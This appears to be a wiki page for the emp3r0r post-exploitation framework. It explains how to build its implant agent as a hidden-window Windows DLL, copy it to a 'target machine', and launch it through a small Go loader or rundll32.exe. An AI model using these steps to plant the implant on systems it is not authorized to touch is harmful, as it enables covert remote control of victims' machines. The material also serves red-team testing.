-
-
Notifications
You must be signed in to change notification settings - Fork 257
DLL Agent
Update ./cmd/agent/main.go to include the following lines:
// everything else
import "C"
//export main
func main() {
// everything else
}This will export the main function, making it callable from outside the DLL.
Ensure that you have both mingw and Go environments installed on your Windows machine.
Run the following command on your Windows host to compile the agent as a DLL:
go build -buildmode=c-shared -ldflags='-s -w -H=windowsgui' -o emp3r0r.dll .\cmd\agent\Move the compiled emp3r0r.dll to the ~/.emp3r0r/stub-win-dll-amd64 directory on your server.
Open emp3r0r on your server, run the gen_agent command, and select option 3 to configure the agent for Windows.
Once the DLL is generated, copy it to your Windows target machine for use.
You can test the DLL using a small tool that invokes functions from a DLL. Here’s an example:
package main
import (
"flag"
"fmt"
"syscall"
)
func main() {
dll_file := flag.String("dll", "", "Load this DLL file")
func_name := flag.String("func", "", "Call this function")
flag.Parse()
dllPath := *dll_file
procName := *func_name
// Load the DLL
dll, err := syscall.LoadLibrary(dllPath)
if err != nil {
fmt.Println("Error loading DLL:", err)
return
}
defer syscall.FreeLibrary(dll)
// Get the function address
proc, err := syscall.GetProcAddress(dll, procName)
if err != nil {
fmt.Println("Error getting function address:", err)
return
}
// Call the function
_, _, _ = syscall.SyscallN(proc, 0, 0, 0, 0)
}To build and run this tool:
In PowerShell, enable logging so you can confirm that the agent is running:
$env:VERBOSE='true'Use the following command to call the main function from your emp3r0r.dll:
.\rundll.exe -func main -dll emp3r0r.dllAlternatively, you can also invoke the DLL using rundll32.exe:
rundll32.exe emp3r0r.dll mainHowever, this might not provide visible output even if VERBOSE is set to true.